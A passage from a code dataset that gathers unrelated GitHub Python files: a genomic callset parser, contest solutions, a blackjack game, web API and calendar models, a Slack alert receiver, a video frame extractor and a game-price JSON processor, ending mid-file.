token:\n this_start = token.split(\"-\")[0]\n this_end = token.split(\"-\")[1]\n this_sv = (chrom, this_start, this_end, sv_info_tokens[0] + \",\" + sv_info_tokens[1] + \",\" + sv_info_tokens[i + 1])\n ind_svs.append(this_sv)\n\n\n writer = open(out, \"w\")\n\n for sv in ind_svs:\n\n out_str = \"{0}\\t{1}\\t{2}\\t{3}\\n\".format(sv[0], sv[1], sv[2], sv[3])\n\n writer.write(out_str)\n\n writer.close()\n\nscript_name = sys.argv[0]\nif len(sys.argv) < 2:\n print('=======================================================')\n print('ParseMako.py Last Update:2020-7-20\\n')\n print('This script is used to process Mako raw callset\\n')\n print('Usage:')\n print('ParseMako.py [options] \\n')\n print('Options:')\n print('config: Create config file for Mako input ')\n print('filter: filter Mako calls ')\n print('tovcf: convert Mako calls to standard VCF format')\n # print('merge: merge mutiple Mako calls')\n\n print(\"=======================================================\")\nelse:\n option = sys.argv[1]\n\n if option == \"config\":\n parser.add_option(\"-b\", dest='bam', help='BAM file to config')\n parser.add_option(\"-n\", type=int, dest=\"num\", help=\"Number of samples used for estimation\")\n parser.add_option(\"-m\", type=int, dest=\"mapq\", help=\"Number of samples used for estimation\")\n parser.add_option(\"-f\", dest=\"fai\", help=\"Index of reference file\")\n parser.add_option(\"-w\", dest='out', help='Working directory')\n parser.add_option(\"-s\", dest=\"name\", help=\"Name of the sample\")\n\n (options, args) = parser.parse_args()\n mako_config(options.bam, options.fai, options.num, options.mapq, options.out, options.name)\n\n elif option == \"tovcf\":\n\n parser.add_option(\"-m\", dest=\"mako\")\n parser.add_option(\"-o\", dest=\"out\")\n (options, args) = parser.parse_args()\n\n if not options.mako:\n parser.error(\"Mako call not given\")\n\n if not options.out:\n parser.error(\"VCF output not given\")\n\n mako_to_vcf(options.mako, options.out)\n\n elif option == \"filter\":\n\n parser.add_option(\"-i\", dest=\"input\", help=\"Input Mako callset\")\n parser.add_option(\"-o\", dest=\"out\", help=\"Output of filtered Mako callset by CXS\")\n parser.add_option(\"-c\", type=int, dest=\"cxs\", help=\"CXS threshold\")\n parser.add_option(\"-f\", dest=\"format\", help=\"output format (original, bed)\")\n (options, args) = parser.parse_args()\n mako_filter(options.input, options.out, options.cxs, options.format)\n\n\n# if __name__ == '__main__':\n# bam_file = \"/Users/jiadonglin/Data/HG00733/HG00733.alt_bwamem_GRCh38DH.20150715.PUR.high_coverage.cram.bam\"\n# fai_file = \"/Users/jiadonglin/Data/ref_genome/GRCh38_full_analysis_set_plus_decoy_hla.fa.fai\"\n# bam_stats = \"/Users/jiadonglin/Data/HG00733/MakoV1/bam_summary.txt\"\n# classify_rps(bam_file, fai_file, 20, 101, 1037, bam_stats)\n\n\n\n\n\n","repo_name":"jiadong324/Mako","sub_path":"scripts/ParseMako.py","file_name":"ParseMako.py","file_ext":"py","file_size_in_byte":18857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"20205140237","text":"# https://www.acmicpc.net/problem/1080\nimport sys\ninput = sys.stdin.readline\n\nn, m = map(int, input().split())\nA = []\nB = []\ncnt = 0\n\nfor _ in range(n):\n A.append(list(map(int, input().strip())))\n\nfor _ in range(n):\n B.append(list(map(int, input().strip())))\n\ndef reverseNum(x, y):\n global cnt\n cnt += 1\n for i in range(x, x+3):\n for j in range(y, y+3):\n if A[i][j] == 0:\n A[i][j] = 1\n else:\n A[i][j] = 0\n\n\ndef solution():\n global cnt\n for i in range(n-2):\n for j in range(m-2):\n if A[i][j] != B[i][j]:\n reverseNum(i, j)\n\n for i in range(n):\n for j in range(m):\n if A[i][j] != B[i][j]:\n cnt = -1\n print(cnt)\n return\n\n print(cnt)\n\n\nsolution()","repo_name":"dlthgml1997/algorithm-sohee","sub_path":"DFS,BFS/1080:행렬.py","file_name":"1080:행렬.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"33688469402","text":"import os\nimport random\ndef clear(): return os.system('cls')\n\n\nlogo = \"\"\"\n.------. _ _ _ _ _ \n|A_ _ |. | | | | | | (_) | | \n|( \\/ ).-----. | |__ | | __ _ ___| | ___ __ _ ___| | __\n| \\ /|K /\\ | | '_ \\| |/ _` |/ __| |/ / |/ _` |/ __| |/ /\n| \\/ | / \\ | | |_) | | (_| | (__| <| | (_| | (__| < \n`-----| \\ / | |_.__/|_|\\__,_|\\___|_|\\_\\ |\\__,_|\\___|_|\\_\\\\\n | \\/ K| _/ | \n `------' |__/ \n\"\"\"\ncards = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]\n\nclear()\nprint(logo)\n\n\ndef deal_card():\n return random.choice(cards)\n\n\nuser_cards = []\ncomputer_cards = []\nis_game_done = False\n\n\ndef calculate_score(cards):\n\n if sum(cards) == 21 and len(cards) == 2:\n return 0\n\n if 11 in cards and sum(cards) > 21:\n cards.remove(11)\n cards.append(1)\n\n return sum(cards)\n\n\ndef compare(user_score, computer_score):\n if user_score == computer_score:\n return \"Draw\"\n elif computer_score == 0:\n return \"Computer has blackjack. You lose.\"\n elif user_score == 0:\n return \"You scored blackjack. You win\"\n elif user_score > 21:\n return \"You lose, you overflowed\"\n elif computer_score > 21:\n return \"You win, computer overflowed\"\n elif user_score > computer_score:\n return \"You win\"\n elif computer_score > user_score:\n return \"You lose\"\n\n\ndef show_cards(user_cards, computer_cards):\n print(\n f\"Your cards: {user_cards} total score : {calculate_score(user_cards)}\")\n print(f\"Computer's first card is: {computer_cards[0]}\")\n\n\ndef play():\n for i in range(2):\n user_cards.append(deal_card())\n computer_cards.append(deal_card())\n\n user_score = calculate_score(user_cards)\n computer_score = calculate_score(computer_cards)\n is_game_done = False\n\n while is_game_done == False:\n clear()\n show_cards(user_cards, computer_cards)\n if user_score == 0 or computer_score == 0 or user_score > 21 or computer_score > 21:\n is_game_done = True\n continue\n\n if input(\"Do you want another card? (y/n) \").lower() == \"y\":\n user_cards.append(deal_card())\n user_score = calculate_score(user_cards)\n if computer_score < 17:\n computer_cards.append(deal_card())\n computer_score = calculate_score(computer_cards)\n else:\n is_game_done = True\n\n while computer_score < 17:\n computer_cards.append(deal_card())\n computer_score = calculate_score(computer_cards)\n\n clear()\n print(f\"Your score: {user_score} Yourcards: {user_cards}\")\n print(\n f\"Computer's score: {computer_score} Computer's cards: {computer_cards}\")\n print(compare(user_score, computer_score))\n\n\nwhile input(\"Do you want to play a Blackjack Game ? (y/n) \").lower() == \"y\":\n user_cards = []\n computer_cards = []\n play()\n","repo_name":"pauldedward/100-Days-of-Code","sub_path":"Day-11/blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":3024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1241797100","text":"import sys\r\n\r\nimport numpy as np\r\n\r\nread = sys.stdin.buffer.read\r\nreadline = sys.stdin.buffer.readline\r\nreadlines = sys.stdin.buffer.readlines\r\n\r\ndef calc_div(N):\r\n sq = int(N**.5 + 10)\r\n x = np.arange(1, sq)\r\n x = x[N % x == 0]\r\n x = np.concatenate((x, N // x))\r\n return np.unique(x)\r\n\r\ndef inv_mod(a, mod):\r\n b, u, v = mod, 1, 0\r\n while b:\r\n t = a // b\r\n a, b = b, a - t * b\r\n u, v = v, u - t * v\r\n return u % mod\r\n\r\ndef main(N):\r\n N *= 2\r\n div = calc_div(N)\r\n for a in div:\r\n a = int(a)\r\n b = N // a\r\n if np.gcd(a, b) != 1:\r\n continue\r\n # b | an + 1\r\n n = (-inv_mod(a, b)) % b\r\n k = a * n\r\n if k == 0:\r\n k += N\r\n assert k * (k + 1) % N == 0\r\n yield k\r\n\r\nN = int(read())\r\nprint(min(main(N)))\n","repo_name":"kagemeka/atcoder-submissions","sub_path":"jp.atcoder/acl1/acl1_b/26707549.py","file_name":"26707549.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"4327138236","text":"from fastapi import APIRouter\n\nfrom models.student import Student\nfrom schemas import studentMapper\nfrom services import studentService\n\nstudent_router = APIRouter()\n\n\n@student_router.get('/students')\nasync def find_all_students():\n all_stud = studentService.get_all()\n return studentMapper.toListOfDTOs(all_stud)\n\n\n@student_router.post('/student')\nasync def create_student(student: Student):\n return studentService.save_student(dict(student))\n\n@student_router.delete('/student/{id}')\nasync def delete_student(id: str):\n studentService.delete_student(id)\n","repo_name":"2snufkin/farm_stack","sub_path":"routes/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"75437302910","text":"# Import the database object (db) from the main application module\n# We will define this inside /app/__init__.py in the next sections.\nimport calendar\nfrom datetime import date, datetime, timedelta\nfrom sqlalchemy import extract, and_\nfrom sqlalchemy.sql import func\nfrom app import db\nimport json\nfrom app.mod_base.base_model import Base\n\n# Define a User model\nclass Calendar(Base):\n __tablename__ = 'calendar'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(128), nullable=False)\n description = db.Column(db.String(256), nullable=False)\n min_year = db.Column(db.SmallInteger, nullable=False, default=2000)\n max_year = db.Column(db.SmallInteger, nullable=False, default=2200)\n time_zone = db.Column(db.String(128), nullable=False, default=\"Europe/Madrid\") \n week_starting_day = db.Column(db.SmallInteger, nullable=False, default=0) # 0: Monday, 6: Sunday\n emojis_enabled = db.Column(db.Boolean, nullable=False, default=True)\n auto_decorate_task_details_hyperlink = db.Column(db.Boolean, nullable=False, default=True)\n show_view_past_btn = db.Column(db.Boolean, nullable=False, default=True)\n hide_past_tasks = db.Column(db.Boolean, nullable=False, default=False)\n days_past_to_keep_hidden_tasks = db.Column(db.SmallInteger, nullable=False, default=62)\n # tasks = db.relationship(\n # 'Task',\n # backref='list',\n # lazy=True,\n # cascade='all, delete, delete-orphan',\n # passive_deletes=True,\n # single_parent=True\n # )\n\n def __init__(\n self,\n id=None,\n name=None,\n description=None,\n min_year=None,\n max_year=None,\n time_zone=None,\n week_starting_day=None,\n emojis_enabled=None,\n show_view_past_btn=None,\n auto_decorate_task_details_hyperlink=True,\n hide_past_tasks=False,\n days_past_to_keep_hidden_tasks=62\n ):\n self.id = id\n self.name = name\n self.description = description\n self.min_year = min_year\n self.max_year = max_year\n self.time_zone = time_zone \n self.week_starting_day = week_starting_day\n self.emojis_enabled = emojis_enabled\n self.show_view_past_btn = show_view_past_btn\n self.auto_decorate_task_details_hyperlink = auto_decorate_task_details_hyperlink\n self.hide_past_tasks = hide_past_tasks\n self.days_past_to_keep_hidden_tasks = days_past_to_keep_hidden_tasks\n\n @staticmethod\n def month_names():\n return [\n \"January\",\n \"February\",\n \"March\",\n \"April\",\n \"May\",\n \"June\",\n \"July\",\n \"August\",\n \"September\",\n \"October\",\n \"November\",\n \"December\",\n ]\n\n @staticmethod\n def month_name(month):\n return Calendar.month_names()[month - 1]\n\n @staticmethod\n def set_first_weekday(weekday):\n calendar.setfirstweekday(weekday)\n\n @staticmethod\n def weekdays(week_starting_day):\n weekdays_headers = [\"MON\", \"TUE\", \"WED\", \"THU\", \"FRI\", \"SAT\", \"SUN\"]\n ret = weekdays_headers[week_starting_day:] + weekdays_headers[0:week_starting_day]\n return ret\n\n @staticmethod\n def previous_month_and_year(year, month):\n previous_month_date = date(year, month, 1) - timedelta(days=2)\n return previous_month_date.month, previous_month_date.year\n\n @staticmethod\n def next_month_and_year(year, month):\n last_day_of_month = calendar.monthrange(year, month)[1]\n next_month_date = date(year, month, last_day_of_month) + timedelta(days=2)\n return next_month_date.month, next_month_date.year\n\n @staticmethod\n def current_date():\n today_date = datetime.date(datetime.now())\n return today_date.day, today_date.month, today_date.year\n\n @staticmethod\n def month_days(year, month):\n return calendar.Calendar(calendar.firstweekday()).itermonthdates(year, month)\n\n @staticmethod\n def month_days_with_weekday(year, month):\n return calendar.Calendar(calendar.firstweekday()).monthdayscalendar(year, month)\n\n '''\n insert()\n inserts a new model into a database\n the model must have a unique name\n the model must have a unique id or null id\n EXAMPLE\n drink = Drink(title=req_title, recipe=req_recipe)\n drink.insert()\n '''\n def insert(self):\n db.session.add(self)\n db.session.commit()\n\n '''\n delete()\n deletes a new model into a database\n the model must exist in the database\n EXAMPLE\n drink = Drink(title=req_title, recipe=req_recipe)\n drink.delete()\n '''\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n '''\n update()\n updates a new model into a database\n the model must exist in the database\n EXAMPLE\n drink = Drink.query.filter(Drink.id == id).one_or_none()\n drink.title = 'Black Coffee'\n drink.update()\n '''\n def update(self):\n db.session.commit()\n\nclass Task(Base):\n __tablename__ = 'task'\n\n id = db.Column(db.Integer, primary_key=True)\n calendar_id = db.Column(db.Integer, db.ForeignKey('calendar.id'), nullable=False)\n title = db.Column(db.String(128), nullable=False)\n color = db.Column(db.String(32), nullable=False)\n details = db.Column(db.String(256), nullable=False)\n start_time = db.Column(db.DateTime, nullable=False, default=func.current_timestamp())\n end_time = db.Column(db.DateTime, nullable=False, default=func.current_timestamp())\n is_all_day = db.Column(db.Boolean, nullable=False, default=False)\n is_recurrent = db.Column(db.Boolean, nullable=False, default=False)\n repetition_value = db.Column(db.SmallInteger, nullable=False, default=0)\n repetition_type = db.Column(db.String(1), nullable=False, default=\"\")\n repetition_subtype = db.Column(db.String(1), nullable=False, default=\"\")\n\n def __init__(\n self,\n calendar_id=None,\n title=None,\n color=None,\n details=None,\n start_time=None,\n end_time=None,\n is_all_day=None,\n is_recurrent=None,\n repetition_value=None,\n repetition_type=None,\n repetition_subtype=None\n ):\n self.calendar_id = calendar_id\n self.title = title\n self.color = color\n self.details = details\n self.start_time = start_time\n self.end_time = end_time\n self.is_all_day = is_all_day\n self.is_recurrent = is_recurrent\n self.repetition_value = repetition_value\n self.repetition_type = repetition_type\n self.repetition_subtype = repetition_subtype\n\n '''\n short()\n short form representation of the Task model\n '''\n def short(self):\n return {\n 'id': self.id,\n 'title': self.title,\n 'color': self.color,\n 'start_time': self.start_time.strftime(\"%d/%m/%Y, %H:%M:%S\"),\n 'end_time' : self.end_time.strftime(\"%d/%m/%Y, %H:%M:%S\")\n }\n\n '''\n long()\n long form representation of the Task model\n '''\n def long(self):\n return {\n 'id': self.id,\n 'calendar_id': self.calendar_id,\n 'title': self.title,\n 'color': self.color,\n 'details': self.details,\n 'start_time': self.start_time.strftime(\"%d/%m/%Y, %H:%M:%S\"),\n 'end_time': self.end_time.strftime(\"%d/%m/%Y, %H:%M:%S\"),\n 'is_all_day': self.is_all_day,\n 'is_recurrent': self.is_recurrent,\n 'repetition_value': self.repetition_value,\n 'repetition_type': self.repetition_type,\n 'repetition_subtype': self.repetition_subtype\n }\n\n def __repr__(self):\n return json.dumps(self.long())\n\n @staticmethod\n def _add_task_to_task_list(tasks_list, day, month, task, view_past_tasks=True):\n if not view_past_tasks:\n # Check if this task should be hidden\n start_time = datetime.now()\n task_end_time = datetime(start_time.year, month, day, task.end_time.hour, task.end_time.minute, task.end_time.second)\n if task_end_time < start_time:\n return\n if month not in tasks_list:\n tasks_list[month] = {}\n if day not in tasks_list[month]:\n tasks_list[month][day] = []\n tasks_list[month][day].append(task)\n\n @staticmethod\n def getTasks(calendar_id, year, month, view_past_tasks):\n tasks = {}\n if True:\n if view_past_tasks:\n m, y = Calendar.previous_month_and_year(year, month)\n start_time = datetime(y, m, 24)\n else:\n start_time = datetime.now()\n m, y = Calendar.next_month_and_year(year, month)\n end_time = datetime(y, m, 6)\n\n # Query and add non recurrent tasks\n tasks_query = Task.query.join(Calendar).filter(Task.calendar_id == calendar_id).filter(\n Task.is_recurrent == False,\n Task.end_time >= start_time,\n Task.start_time < end_time\n ).all()\n for task in tasks_query:\n task_day = task.start_time.day\n task_month = task.start_time.month\n Task._add_task_to_task_list(tasks, task_day, task_month, task)\n\n # Query and add recurrent tasks\n recurrent_tasks_query = Task.query.join(Calendar).filter(Task.calendar_id == calendar_id).filter(\n Task.is_recurrent == True,\n extract('year', Task.start_time) == year\n ).all()\n for task in recurrent_tasks_query:\n monthly_repetition_done = False\n for week in Calendar.month_days_with_weekday(year, month):\n for weekday, day in enumerate(week):\n if day == 0:\n continue\n if task.repetition_type == 'w':\n # Weekly repetition: repetition_value is a week day\n if task.repetition_value == weekday:\n Task._add_task_to_task_list(tasks, day, month, task, view_past_tasks)\n elif task.repetition_type == 'm':\n if task.repetition_subtype == 'w':\n # Monthly repetition: repetition_value is a week day\n if task.repetition_value == weekday and not monthly_repetition_done:\n Task._add_task_to_task_list(tasks, day, month, task, view_past_tasks)\n monthly_repetition_done = True\n elif task.repetition_subtype == 'm':\n # Monthly repetition: repetition_value is a day\n if task.repetition_value == day:\n Task._add_task_to_task_list(tasks, day, month, task, view_past_tasks)\n else:\n today = datetime.today()\n today = datetime(today.year, today.month, today.day)\n #last_day = Calendar.month_days(year, month)\n\n if view_past_tasks:\n past_tasks_query = Task.query.join(Calendar).filter(Task.calendar_id == calendar_id).filter(\n Task.is_recurrent == False,\n Task.start_time < today,\n extract('year', Task.start_time) == year\n ).all()\n\n for el in past_tasks_query:\n task_day = el.start_time.day\n task_month = el.start_time.month\n if task_month not in tasks:\n tasks[task_month] = {}\n if task_day not in tasks[task_month]:\n tasks[task_month][task_day] = []\n # tasks[str(month)][str(task_day)].append(el)\n tasks[task_month][task_day].append(el)\n\n upcoming_tasks_query = Task.query.join(Calendar).filter(Task.calendar_id == calendar_id).filter(\n Task.is_recurrent == False,\n Task.start_time >= today,\n extract('year', Task.start_time) == year,\n extract('month', Task.start_time) == month\n ).all()\n #upcoming_tasks_query = Task.query.filter(Task.calendar_id == calendar_id).all()\n\n for el in upcoming_tasks_query:\n task_day = el.start_time.day\n task_month = el.start_time.month\n if task_month not in tasks:\n tasks[task_month] = {}\n if task_day not in tasks[task_month]:\n tasks[task_month][task_day] = []\n # tasks[str(month)][str(task_day)].append(el)\n tasks[task_month][task_day].append(el)\n\n recurrent_tasks_query = Task.query.join(Calendar).filter(Task.calendar_id == calendar_id).filter(\n Task.is_recurrent == True,\n extract('year', Task.start_time) == year\n ).all()\n\n return tasks\n\n # @staticmethod\n # def getTask(calendar_id, task_id, is_recurrent, year, month, day):\n # if is_recurrent:\n # tasks_query = Task.query.join(Calendar).filter(Task.calendar_id == calendar_id).filter(\n # Task.id == task_id,\n # Task.is_recurrent == is_recurrent\n # ).all()\n # else:\n # tasks_query = Task.query.join(Calendar).filter(Task.calendar_id == calendar_id).filter(\n # Task.id == task_id,\n # extract('year', Task.start_time) == year,\n # extract('month', Task.start_time) == month,\n # extract('day', Task.start_time) == day\n # ).all()\n # if len(tasks_query) == 0:\n # return None\n # return vars(tasks_query[0])\n\n @staticmethod\n def getTask(task_id):\n return Task.query.get(task_id)\n\n '''\n insert()\n inserts a new model into a database\n the model must have a unique name\n the model must have a unique id or null id\n EXAMPLE\n drink = Drink(title=req_title, recipe=req_recipe)\n drink.insert()\n '''\n def insert(self):\n db.session.add(self)\n db.session.commit()\n\n '''\n delete()\n deletes a new model into a database\n the model must exist in the database\n EXAMPLE\n drink = Drink(title=req_title, recipe=req_recipe)\n drink.delete()\n '''\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n '''\n update()\n updates a new model into a database\n the model must exist in the database\n EXAMPLE\n drink = Drink.query.filter(Drink.id == id).one_or_none()\n drink.title = 'Black Coffee'\n drink.update()\n '''\n def update(self):\n db.session.commit()\n","repo_name":"kilauea/FSND-capstone","sub_path":"app/mod_calendar/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":15110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12148585013","text":"import requests\nfrom typing import List, Dict, Optional\n\nfrom . import BaseReceiver\nfrom ..rule import Rule\n\n\nclass SlackReceiver(BaseReceiver):\n def __init__(\n self,\n url: str,\n username: str,\n icon_emoji: str = \":robot_face:\",\n channel: Optional[str] = None,\n icon_url: Optional[str] = None,\n ):\n self._url = url\n self._username = username\n self._icon_emoji = icon_emoji\n self._channel = channel\n self._icon_url = icon_url\n super().__init__()\n\n def post(\n self,\n rule: Rule,\n result: List[Dict],\n ):\n payload = dict()\n if self._username:\n payload[\"username\"] = self._username\n if self._icon_url:\n payload[\"icon_url\"] = self._icon_url\n if self._icon_emoji:\n payload[\"icon_emoji\"] = self._icon_emoji\n if self._channel:\n payload[\"channel\"] = self._channel\n\n pretext = f\"Chain: `{rule.chain}` RuleID: `{rule.id}`\"\n\n message = [f\"Rule description: `{rule.description}`\"]\n for item in result:\n labels = [\n f\"{k.title()}: `{v}`\" for k, v in rule.labels.format(item).items()\n ]\n message.extend(labels)\n message.append(rule.output.format(item))\n msg = \"\\n\".join(message)\n\n payload[\"attachments\"] = [\n {\n \"color\": \"info\",\n \"fields\": [{\"title\": \"Chain Alert\", \"value\": msg, \"short\": False}],\n \"pretext\": pretext,\n \"fallback\": pretext,\n }\n ]\n\n requests.post(self._url, json=payload)\n","repo_name":"jsvisa/blockchain-etl","sub_path":"blockchainetl/alert/receivers/slack_receiver.py","file_name":"slack_receiver.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"2959886486","text":"import os, sys, shutil\nimport os.path as osp\nimport subprocess as sp\nimport general_utils as gnu\n\n\ndef extract_frame(video_dir, frame_dir):\n for file in os.listdir(video_dir):\n if file.endswith((\".mov\", \".mp4\")):\n file_path = osp.join(video_dir, file)\n file_name = file[:-4]\n # if file_name != 'legao_02_01': continue\n res_dir = osp.join(frame_dir, file_name)\n gnu.build_dir(res_dir)\n command = f\"ffmpeg -i {file_path} {res_dir}/{file_name}_%05d.png\"\n command = command.split()\n sp.run(command)\n\n\ndef main():\n root_dir = \"./sample_data/\"\n\n video_dir = osp.join(root_dir, \"videos\")\n frame_dir = osp.join(root_dir, \"frames\")\n gnu.renew_dir(frame_dir)\n\n extract_frame(video_dir, frame_dir)\n\nif __name__ == '__main__':\n main()","repo_name":"facebookresearch/frankmocap","sub_path":"mocap_utils/extract_frame.py","file_name":"extract_frame.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":2052,"dataset":"github-code","pt":"60"} +{"seq_id":"6421932622","text":"from database_utils import bulk_add_details,bulk_add_graphs,bulk_add_five_minute_averages\nimport datetime\nimport logging\n\ndef create_detail_key(\n id:str,\n time_extracted:str = datetime.datetime.now().strftime(\"%y%m%d%H%M\")\n) -> str:\n \"\"\"\n Generate an n-character hash key + a timestamp in milliseconds seperated by a '-' character to be used as primary key\n for the details table.\n\n Parameters:\n id (str): Hash id of json file\n timestamp (str): datetime extraction of json contents in YYMMDDHHmm form\n\n Returns:\n id+'-'+time_extracted (str): A string concatenation to be used as a primary key in a database\n \"\"\"\n \n return id+'-'+time_extracted\n\ndef create_five_minute_average_key(\n id:str,\n time_extracted:str = datetime.datetime.now().strftime(\"%y%m%d%H%M\")\n) -> str:\n \"\"\"\n Generate an n-character hash key + a timestamp in milliseconds seperated by a '-' character to be used as primary key\n for the five minute averages table.\n\n Parameters:\n id (str): Hash id of json file\n timestamp (str): datetime extraction of json contents in YYMMDDHHmm form\n\n Returns:\n id+'-'+time_extracted (str): A string concatenation to be used as a primary key in a database\n \"\"\"\n \n return id+'-'+time_extracted\n\n\ndef create_graph_key(\n id:str,\n timestamp:str,\n) -> str:\n \"\"\"\n Generate an n-character hash key + a timestamp in milliseconds seperated by a '-' character to be used as primary key\n for the graphs table.\n\n Parameters:\n id (str): Hash id of json file\n timestamp (str): timestamp in milliseconds since January 1st 1970\n\n Returns:\n id+'-'+ timestamp (str): A string concatenation to be used as a primary key in a database\n \"\"\"\n \n return id+'-'+timestamp\n\n\ndef extract_row_tuple_details(\n data:dict,\n id:str\n) -> tuple:\n \"\"\"\n Extract all keys from a single dictionary entry and return it as a 17-tuple.\n\n Parameters:\n data (dict): A raw json file\n id (str): Hash id of raw json file in the first argument\n\n Returns:\n (\n uuid,\n type,\n item_id,\n name,\n description,\n members,\n current_trend,\n current_price,\n today_trend,\n today_price,\n day30_trend,\n day30_change,\n day90_trend,\n day90_change,\n day180_trend,\n day180_change\n ) (tuple): A 16-tuple to be used in bulk_process_json\n \"\"\"\n\n # extract all keys from 1 dictionary entry\n item_id = data['item']['id']\n type = data['item']['type']\n name = data['item']['name']\n description = data['item']['description']\n current_trend = data['item']['current']['trend']\n current_price = data['item']['current']['price']\n today_trend = data['item']['today']['trend']\n today_price = data['item']['today']['price']\n members = data['item']['members']\n day30_trend = data['item']['day30']['trend']\n day30_change = data['item']['day30']['change']\n day90_trend = data['item']['day90']['trend']\n day90_change = data['item']['day90']['change']\n day180_trend = data['item']['day180']['trend']\n day180_change = data['item']['day180']['change']\n primary_key = create_detail_key(id)\n\n # return extracted keys\n return (\n primary_key,\n type, \n item_id, \n name, \n description, \n members, \n current_trend,\n current_price, \n today_trend,\n today_price, \n day30_trend, \n day30_change, \n day90_trend, \n day90_change,\n day180_trend, \n day180_change \n )\n\ndef extract_list_tuple_graphs(\n data:dict,\n id:str\n) -> list:\n \"\"\"\n Extract all keys and values from a graphs json as a list of 4-tuples.\n\n Parameters:\n data (dict): A raw json file\n id (str): Hash id of raw json file in the first argument\n\n Returns:\n graph_values (list): a list of 4-tuples containing the first sale price and 30 day average at a given timestamp\n in the order (primary key, timestamp, first sale price, 30 day average) for each tuple\n \"\"\"\n\n # split data into daily and average keys to make extracting values easier\n daily = data['daily']\n average = data['average']\n \n # extract all timestamps by getting the keys of either daily or average\n # picking either is okay as the timestamps are in line with eachother\n timestamps = list(daily.keys())\n first_sale_prices = list(daily.values())\n average_30_days = list(average.values())\n\n graph_values = []\n\n # place all values into a list of tuples with the addition of a primary key \n for timestamp in range(180):\n primary_key = create_graph_key(id,timestamps[timestamp])\n graph_values.append((primary_key,timestamps[timestamp],first_sale_prices[timestamp],average_30_days[timestamp]))\n \n # return extracted keys\n return graph_values\n\ndef extract_row_tuple_five_minute_average(\n data:dict,\n id:str\n) -> tuple:\n \"\"\"\n Extract all keys from a single dictionary entry and return it as a 5-tuple.\n\n Parameters:\n data (dict): A raw json file\n id (str): Hash id of raw json file in the first argument\n\n Returns:\n (\n primary_key,\n average_high_price,\n high_price_volume,\n average_low_price,\n low_price_volume\n ) (tuple): A 5-tuple to be used in bulk_process_json\n \"\"\"\n \n # extract all values from json keys and generate primary key\n primary_key = create_five_minute_average_key(id)\n average_high_price = data['avgHighPrice']\n high_price_volume = data['highPriceVolume']\n average_low_price = data['avgLowPrice']\n low_price_volume = data['lowPriceVolume']\n\n # return 5-tuple for later insertion into database table\n return (\n primary_key,\n average_high_price,\n high_price_volume,\n average_low_price,\n low_price_volume\n )\n\ndef log_id(\n id:str,\n table:str\n) -> None:\n \n \"\"\"\n Log each row insertion into database for debugging purposes.\n\n Parameters:\n id (str): Hash id of raw json file passed into bulk_process_json\n table (str): Table name where json entries will be inserted\n \"\"\"\n \n # keep track of hash id in case of debugging needs\n logging.basicConfig(format=\"%(asctime)s - %(message)s\",level=logging.INFO)\n logging.info(f'id: {id} inserted into {table} table')\n\ndef bulk_process_detail_json(\n database:str,\n raw_json:dict,\n id:str\n) -> None:\n \n \"\"\"\n Add a row of json entries into a database \n\n Parameters:\n database (str): Database name \n raw_json (dict): Raw json response fetched from API call\n id (str): Hash id of raw json file\n \"\"\"\n \n data = extract_row_tuple_details(raw_json,id)\n\n # add all values of a row into the details table\n bulk_add_details(data,database)\n\n log_id(data[0],\"details\")\n\ndef bulk_process_graph_json(\n database:str,\n raw_json:dict,\n id:str\n) -> None:\n \"\"\"\n Add 180 rows of json entries into a database \n\n Parameters:\n database (str): Database name \n raw_json (dict): Raw json response fetched from API call\n id (str): Hash id of raw json file\n \"\"\"\n data = extract_list_tuple_graphs(raw_json,id)\n\n # add all values of a row into the details table\n \n for row in data:\n bulk_add_graphs(row,database)\n log_id(row,\"graphs\")\n\ndef bulk_process_five_minute_average_json(\n database:str,\n raw_json:dict,\n id:str\n) -> None:\n \"\"\"\n Add a rows of json entries into a database \n\n Parameters:\n database (str): Database name \n raw_json (dict): Raw json response fetched from API call\n id (str): Hash id of raw json file\n \"\"\"\n data = extract_row_tuple_five_minute_average(raw_json,id)\n\n # add all values of a row into the details table\n bulk_add_five_minute_averages(data,database)\n log_id(data[0],\"five minute averages\")","repo_name":"aung-st/OSRS-Bond-Tracking","sub_path":"src/process_json.py","file_name":"process_json.py","file_ext":"py","file_size_in_byte":7896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"71857773599","text":"import asyncio\nimport multiprocessing\nimport os\nimport sys\nfrom time import perf_counter\n\nimport optuna\n\nfrom cli.arg_parse import execute_for_args\nfrom cli.checks.engine_use_statistics import engine_statistics\nfrom cli.checks.latest_version import print_warning_if_version_outdated\nfrom cli.prepare_workspace import prepare_workspace\nfrom cli.print_utils import print_debug, is_verbosity\nfrom main_controller import MainController\nfrom utils.utils import check_internet_connection, prepend_resource_dir\n\n# Hack, PyInstaller + rich on Windows in GitHub actions fails because it cannot find encoding of stdout, this sets\n# it on stdout if not set\n\nos.environ[\"PYTHONIOENCODING\"] = \"utf-8\"\nPYTHONIOENCODING = os.environ.get(\"PYTHONIOENCODING\", False)\nif sys.stdout.isatty() is False and PYTHONIOENCODING is not False and sys.stdout.encoding != PYTHONIOENCODING:\n sys.stdout = open(sys.stdout.fileno(), 'w', encoding='utf-8', closefd=False)\n\nRUNFOLDER = os.path.dirname(os.path.realpath(__file__))\n\n\ndef main(online: bool):\n if online:\n 